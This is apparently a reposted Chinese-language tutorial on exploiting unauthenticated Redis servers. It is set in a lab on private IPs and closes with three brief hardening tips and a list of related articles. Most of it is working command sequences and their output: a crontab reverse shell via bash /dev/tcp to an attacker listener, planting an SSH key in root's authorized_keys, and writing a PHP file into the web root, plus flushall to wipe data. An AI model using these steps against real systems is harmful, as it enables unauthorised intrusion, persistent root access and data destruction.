Redis未授權訪問漏洞利用總結
0x01 redis介紹
Redis是一個開源的使用ANSI C語言編寫、支援網路、可基於記憶體亦可持久化的日誌型、Key-Value資料庫,並提供多種語言的API。從2010年3月15日起,Redis的開發工作由VMware主持。從2013年5月開始,Redis的開發由Pivotal贊助。
Redis因配置不當可以未授權訪問。攻擊者無需認證訪問到內部資料,可導致敏感資訊洩露,也可以惡意執行flushall來清空所有資料。
攻擊者可通過EVAL執行lua程式碼,或通過資料備份功能往磁碟寫入後門檔案。
如果Redis以root身份執行,可以給root賬戶寫入SSH公鑰檔案,直接通過SSH登入受害伺服器。
0x02 本地漏洞環境搭建
靶機:CentOS6.5
CentOS安裝redis:
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
makevim redis.confbind 127.0.0.1前面加上#號 protected-mode設為no
啟動redis-server
./src/redis-server redis-conf預設的配置是使用6379埠,沒有密碼。這時候會導致未授權訪問然後使用redis許可權寫檔案。
0x03 攻擊測試
nmap掃描伺服器開啟埠
1.redis基本命令
連線redis:
redis-cli -h 192.168.63.130檢視redis版本資訊、一些具體資訊、伺服器版本資訊等等:
192.168.63.130:6379>info192.168.63.130:6379>set x "test"192.168.63.130:6379>flushall192.168.63.130:6379>KEYS *獲取預設的redis目錄、和rdb檔名:可以在修改前先獲取,然後走的時候再恢復。
192.168.63.130:6379>CONFIG GET dir192.168.63.130:6379>CONFIG GET dbfilename2.攻擊的幾種方法
(1).利用計劃任務執行命令反彈shell
在redis以root許可權執行時可以寫crontab來執行命令反彈shell
先在自己的伺服器上監聽一個埠
nc -lvnp 7999root@kali:~# redis-cli -h 192.168.63.130
192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
OK
192.168.63.130:6379> config set dir /var/spool/cron/
OK
192.168.63.130:6379> config set dbfilename root
OK
192.168.63.130:6379> save
OK
nc監聽埠已經反彈回來shell
ps:此處使用bash反彈shell,也可使用其他方法
(2).寫ssh-keygen公鑰然後使用私鑰登陸
在以下條件下,可以利用此方法
- Redis服務使用ROOT賬號啟動
- 伺服器開放了SSH服務,而且允許使用金鑰登入,即可遠端寫入一個公鑰,直接登入遠端伺服器。
首先在本地生成一對金鑰:
root@kali:~/.ssh# ssh-keygen -t rsa
然後redis執行命令:
192.168.63.130:6379> config set dir /root/.ssh/
OK
192.168.63.130:6379> config set dbfilename authorized_keys
OK
192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
OK
192.168.63.130:6379> save
OK
(3).往web物理路徑寫webshell
當redis許可權不高時,並且伺服器開著web服務,在redis有web目錄寫許可權時,可以嘗試往web路徑寫webshell
執行以下命令
192.168.63.130:6379> config set dir /var/www/html/
OK
192.168.63.130:6379> config set dbfilename shell.php
OK
192.168.63.130:6379> set x "<?php phpinfo();?>"
OK
192.168.63.130:6379> save
OK即可將shell寫入web目錄(web目錄根據實際情況)
0x04 安全配置
- 限制登入ip
- 新增密碼
- 修改預設埠
相關文章
- Redis 未授權訪問漏洞利用Redis
- 利用redis未授權訪問漏洞(windows版)RedisWindows
- 【漏洞復現】Redis未授權訪問漏洞Redis
- 銘說 | Redis未授權訪問漏洞GetshellRedis
- mongodb未授權訪問漏洞MongoDB
- Redis v6.0.5未授權訪問漏洞復現Redis
- Redis 未授權訪問漏洞(附Python指令碼)RedisPython指令碼
- 利用CouchDB未授權訪問漏洞執行任意系統命令
- Redis未授權漏洞復現Redis
- Druid未授權訪問實戰利用UI
- 系統滲透漏洞の未授權訪問
- JBOSS未授權訪問
- Mongodb未授權訪問漏洞全網探測報告MongoDB
- Java安全漏洞:Druid未授權訪問解決JavaUI
- Linux sudo 漏洞可能導致未經授權的特權訪問Linux
- SSRF結合Redis未授權的打法Redis
- spark未授權RCE漏洞Spark
- Redis 未授權訪問缺陷可輕易導致系統被黑Redis
- 從零開始學習各種常見未授權訪問漏洞
- 多款Intel產品未授權訪問漏洞(CVE-2017-5689)Intel
- Hadoop Yarn REST API未授權漏洞利用挖礦分析HadoopYarnRESTAPI
- Etcd REST API 未授權訪問漏洞暴露 750MB 密碼和金鑰RESTAPI密碼
- 記一次特別的未授權訪問
- 【雲原生攻防研究】Istio訪問授權再曝高危漏洞
- SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)
- php反序列化和redis未授權PHPRedis
- redis漏洞利用Redis
- MySQL建立使用者授權訪問MySql
- 配置apache授權訪問目錄(轉)Apache
- CVE-2021-45232 Apache APISIX 從未授權訪問到RCEApacheAPI
- mysql8.0授權root遠端訪問MySql
- 基於Docker的MongoDB實現授權訪問DockerMongoDB
- Flipboard 資料庫未經授權訪問使用者賬號密碼洩露資料庫密碼
- mysql各個級別授權的總結MySql
- HTTP 錯誤401.1 - 未經授權:訪問由於憑據無效被拒絕HTTP
- 蘋果補上了可被未授權收集感測器資料的iPhone漏洞蘋果iPhone
- PHP利用Redis鎖解決併發訪問PHPRedis
- [BUG反饋]分類授權漏洞